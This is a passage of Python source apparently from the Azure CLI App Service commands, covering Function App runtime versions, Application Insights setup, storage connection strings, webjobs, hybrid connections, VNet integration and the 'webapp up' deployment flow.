extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
# content share name should be up to 63 characters long, lowercase letter and digits, and random
# so take the first 50 characters of the app name and add the last 12 digits of a random uuid
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
# reformats the vnet entry, removing unecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, True)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check, False)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False,
is_webapp=True):
from azure.mgmt.web.models import SitePatchResource
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx)
if is_webapp:
app = show_webapp(cmd, resource_group_name, name, slot)
else:
app = show_functionapp(cmd, resource_group_name, name, slot)
parsed_plan = parse_resource_id(app.app_service_plan_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
subnet_id = subnet_info["subnet_resource_id"]
if not slot:
client.web_apps.update(resource_group_name=resource_group_name,
name=name,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
else:
client.web_apps.update_slot(resource_group_name=resource_group_name,
name=name,
slot=slot,
site_envelope=SitePatchResource(virtual_network_subnet_id=subnet_id))
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
